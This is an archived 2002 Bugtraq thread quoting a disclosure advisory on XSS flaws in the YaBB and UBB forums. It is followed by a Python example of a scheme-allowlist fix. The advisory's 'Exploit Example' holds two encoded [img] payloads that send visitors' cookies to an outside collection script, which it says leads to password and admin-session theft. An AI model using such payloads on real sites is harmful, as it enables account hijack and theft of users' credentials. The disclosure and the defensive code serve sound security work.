RE: CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]

From: Obscure (obscureat_private)
Date: Thu Jan 10 2002 - 09:44:37 PST


    Hi 3APA3A,
    
    I recall that post, however UBB seemed that it had fixed it.
    In fact UBB now filters keywords such as javascript and cookie.
    To circumvent this filtering, I made use of html encoding techniques.
    What I wanted to highlight in this advisory was that the protection
    implemented in both UBB and YaBB against Javascript injection (aka CSS)
    is vulnerable to this kind of attack. Of course the issue described by
    Scott Ashman and the one described by me are very similar.
    
    Regards,
    
    Obscure^
    obscureat_private
    
    http://www.eyeonsecurity.net
    
    
    -----Original Message-----
    From: 3APA3A [mailto:3APA3Aat_private]
    Sent: 10 January 2002 10:45
    To: Obscure
    Cc: bugtraqat_private
    Subject: Re: CSS vulnerabilities in YaBB and UBB allow account hijack
    [Multiple Vendor]
    
    
    Hello Obscure,
    
    This issue was reported on Bugtraq for UBB 5 in February 2001 by Scott
    Ashman. AlphaVersion has reported a weakness in the cookie generation
    scenario.
    
    See http://www.security.nnov.ru/search/news.asp?binid=1006
    
    --Wednesday, January 09, 2002, 2:11:59 AM, you wrote to
    bugtraqat_private:
    
    O> Advisory Title: CSS vulnerabilities in YaBB and UBB allow account hijack
    O> [Multiple Vendor]
    O> Release Date: 08/01/2002
    
    O> Application: YaBB and UBB
    
    
    O> Platform: Any system supporting PERL.
    
    O> Build -
    O> YaBB : 1 Gold - Service Pack 1 - older versions were affected in the same
    O> way.
    O> UBB : Ultimate Bulletin Board™ 6.2.0 Beta Release 1.0
    
    
    O> Severity: Malicious users can steal session cookies, allowing
    O> administrative access to the bulletin board.
    
    O> Author:
    O> Obscure^
    O> [ obscureat_private ]
    
    O> Vendor Status:
    O> YaBB - Informed on 01 Jan 2002, should fix some time in the future ...
    O> UBB - Informed on 08 Jan 2002, should issue a fix on 09 Jan 2002 (seems
    O> like they knew about the issue).
    
    O> Web:
    
    O> http://yabb.xnull.com
    O> http://www.infopop.com/products/ubb/
    O> http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html
    
    
    O> Background.
    
    O> (extracted from
    O> http://yabb.xnull.com)
    
    O> YaBB is a leading provider of FREE, downloadable Perl forums for
    O> webmasters, with currently over 50,000 web communities using YaBB
    O> worldwide, and over 1 million registered users throughout these forums!
    O> Join the messaging revolution; keep visitors coming back....
    
    O> (extracted from
    O> http://www.infopop.com/products/ubb/)
    O> The Ultimate Bulletin Board (UBB)™ is the most widely adopted Perl
    O> message board on the Web. With a solid five year development history,
    O> and worldwide familiarity, it is easy to use and maintain.
    
    O> Problem.
    
    O> When a user inserts [IMG]url[/IMG], YaBB changes that text to
    O> <img src='url'>. If someone inserts javascript:alert() instead of the
    O> url, the javascript code is executed by Internet Explorer or some other
    O> web browsers. This allows stealing of cookie data and other interesting
    O> things. YaBB has filtered the javascript method, however it does not
    O> take into consideration that javascript: can be encoded using standard
    O> HTML hex and ASCII encoding. Same with UBB.
    O> In UBB I need to encode several strings because they added checking for
    O> certain keywords such as cookie.
    O> In my example I change javascript: to javascr&#x69;pt:
    
    
    O> Exploit Example.
    
    O> Inserting a new topic (or reply) with the following text will send
    O> visitor's cookies to Eye on Security. The output is saved to
    O> http://eyeonsecurity.net/tools/cookies.txt .
    O> Cookies will contain the password in the case of UBB and a session
    O> cookie (or encoded password) in YaBB.
    
    O> -- snap YaBB --
    
    O> [img]javascr&#x69;pt:document.write
    O> ('&#x3cimg
    O> src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(document.cookie)+'&#x3e')
    O> [/img].
    
    O> -- snap YaBB --
    
    O> -- snap UBB --
    
    O> [IMG]javascr&#x69;pt:document.wr&#x69;te
    O> &#x28;'<img%20src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?cookie='+escape&#x28;document.cook&#x69;e&#x29;+'>'&#x29;
    O> [/IMG]
    
    O> -- snap UBB --
    
    
    O> Fix.
    
    O> IMG tags should start with http, so that Javascript: and other goodies
    O> (play with mailto:) are not allowed.
    
    
    O> Note.
    
    O> Other Bulletin Board Systems may also be vulnerable to these attacks.
    
    
    O> Disclaimer.
    
    O> The information within this document may change without notice. Use of
    O> this information constitutes acceptance for use in an AS IS
    O> condition. There are NO warranties with regard to this information.
    O> In no event shall the author be liable for any consequences whatsoever
    O> arising out of or in connection with the use or spread of this
    O> information. Any use of this information lays within the user's
    O> responsibility.
    
    
    O> Feedback.
    
    O> Please send suggestions, updates, and comments to:
    
    O> Eye on Security
    O> mail : obscureat_private
    O> web : http://www.eyeonsecurity.net
    
    
    
    --
    ~/ZARAZA
    I alone exist, flying nowhere. (Lem)
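The advisory's point is that a keyword blacklist applied to the raw [img] text is defeated by character references, while the fix it proposes (require the URL to start with http) is not. The following is an added illustration, not code from YaBB, UBB or the advisory: it is written in Python rather than the boards' Perl, and the sample URLs use the constructed host example.invalid. It decodes the URL the way the browser will before checking the scheme against an allowlist, and attribute-escapes the accepted URL when building the <img> tag.

```python
import html
import re

# Keywords the advisory says the boards searched for in the raw [img] text.
BANNED_KEYWORDS = ("javascript", "cookie")

def keyword_filter_allows(raw):
    """The weak check described in the advisory: a keyword search over the
    raw text. 'javascr&#x69;pt:' contains no 'javascript', so it passes."""
    lowered = raw.lower()
    return not any(word in lowered for word in BANNED_KEYWORDS)

def canonicalize(raw):
    """Reduce the URL to the form the browser interprets once it sits in an
    <img src='...'> attribute: character references decoded, surrounding
    whitespace dropped, and tab/CR/LF (which URL parsers ignore) removed."""
    decoded = html.unescape(raw.strip())
    return re.sub(r"[\t\r\n]", "", decoded)

# The advisory's fix: only http(s) URLs may be turned into an <img> tag.
SCHEME_ALLOWLIST = re.compile(r"^https?://", re.IGNORECASE)

def img_url_allowed(raw):
    """Allowlist check on the canonical URL. javascript:, mailto:, data: and
    scheme-relative '//host' are all rejected, however the letters of the
    scheme were encoded, because the decision is made after decoding."""
    return SCHEME_ALLOWLIST.match(canonicalize(raw)) is not None

def render_img_tag(raw):
    """Hardened replacement for the [img]url[/img] -> <img src='url'> step.
    Rejected URLs are echoed back as escaped text; accepted URLs are
    attribute-escaped so a quote inside the URL cannot close src='...'
    and smuggle in an event-handler attribute."""
    url = canonicalize(raw)
    if not SCHEME_ALLOWLIST.match(url):
        return "[img]%s[/img]" % html.escape(url, quote=True)
    return "<img src='%s'>" % html.escape(url, quote=True)

if __name__ == "__main__":
    # Constructed samples: a normal image URL, the advisory's encoded scheme
    # trick (with a harmless body), and the mailto: case the advisory mentions.
    for sample in ("http://example.invalid/pic.gif",
                   "javascr&#x69;pt:alert()",
                   "mailto:user@example.invalid"):
        print("%-32r keyword filter: %-5s allowlist: %s"
              % (sample, keyword_filter_allows(sample), img_url_allowed(sample)))
```

Running the module shows the encoded sample passing the keyword filter and failing the allowlist, which is the gap the advisory describes.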
    


